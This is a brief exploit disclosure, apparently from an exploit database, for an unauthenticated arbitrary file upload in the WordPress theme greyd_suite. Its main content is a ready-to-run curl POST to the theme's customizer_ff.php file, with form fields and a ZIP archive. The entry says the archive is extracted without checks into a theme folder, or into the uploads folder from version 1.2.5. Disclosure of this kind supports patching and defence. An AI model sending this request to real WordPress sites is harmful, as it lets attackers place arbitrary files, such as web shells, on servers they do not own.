Share
## https://sploitus.com/exploit?id=WPEX-ID:C330F92B-1E21-414F-B316-D5E97CB62BD1
Send a POST requests against the wp-content/themes/greyd_suite/inc/customizer_ff.php file with some POST params and a ZIP file containing a CSS file and any other content:

curl --location --request POST 'https://theme-tests.docker.test/wp-content/themes/greyd_suite/inc/customizer_ff.php' \
--form 'mode="upload"' \
--form 'uploadpath="hackpath"' \
--form 'name_full="hackname"' \
--form 'file=@hack.zip;type=application/zip'

This will extract the files into wp-content/themes/greyd_suite/inc/hackpath/hack/ without any checks of the files included in the ZIP file.

From version 1.2.5, the uploaded files will be found in wp-content/uploads/greyd_tp/custom_fonts/hack/